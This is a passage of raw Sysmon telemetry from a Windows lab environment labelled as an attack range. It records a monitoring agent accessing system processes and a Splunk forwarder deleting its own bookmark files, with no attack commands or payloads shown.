Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=862C05184110ACFCFBC5F5A43C59CBB9,SHA256=BA1E76BDC05BA3CF7DAD5C026EB0B31607805BE083A4999FF74C6F36B9471A92,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018076Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:41.760{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F2ED43D53272A5A3689CB49F86C8AF2,SHA256=421235FD7E3F2ADA31E9C56A2C635B71A8530D7CCD36B7A3D6B041E2B2AD6ECA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045697Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:41.834{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B435345C8B7F70C3BFE56F41C2E9F97,SHA256=789ABA2E401C12E50A83C8E2372989B868A0E8775CF58C55E6EBDE34C08FE197,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018108Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:42.829{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5ECF34392D815A80E6CD69622372E5D,SHA256=D757EC75A15153E7D814404F3DE303102DB1C0A5B94D3D18E4C0B38FA51B8116,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018107Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:42.783{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018106Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:42.780{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018105Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:42.779{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018104Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:42.774{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018103Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:42.769{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018102Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:42.768{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018101Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:42.768{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 23542300x800000000000000045699Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:42.940{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB4810C6BC1BB4D1A573CF1560BEAD3B,SHA256=31C4811D6DF1013AC89D5782F2C93CC7145059F7255539F9CE6F388FCC6CB5CD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000018100Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:42.763{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018099Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:42.762{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018098Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:42.760{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018097Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:42.757{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018096Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:42.749{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018095Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:42.746{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018094Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:42.743{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018093Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:42.732{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018092Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:42.728{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018091Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:42.719{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018090Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:42.716{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018089Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:42.698{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018088Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:42.688{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018087Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:42.678{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018086Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:42.670{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018085Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:42.658{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018084Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:42.626{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018083Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:42.614{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018082Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:42.607{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018081Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:42.596{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018080Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:42.587{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018079Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:42.575{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program 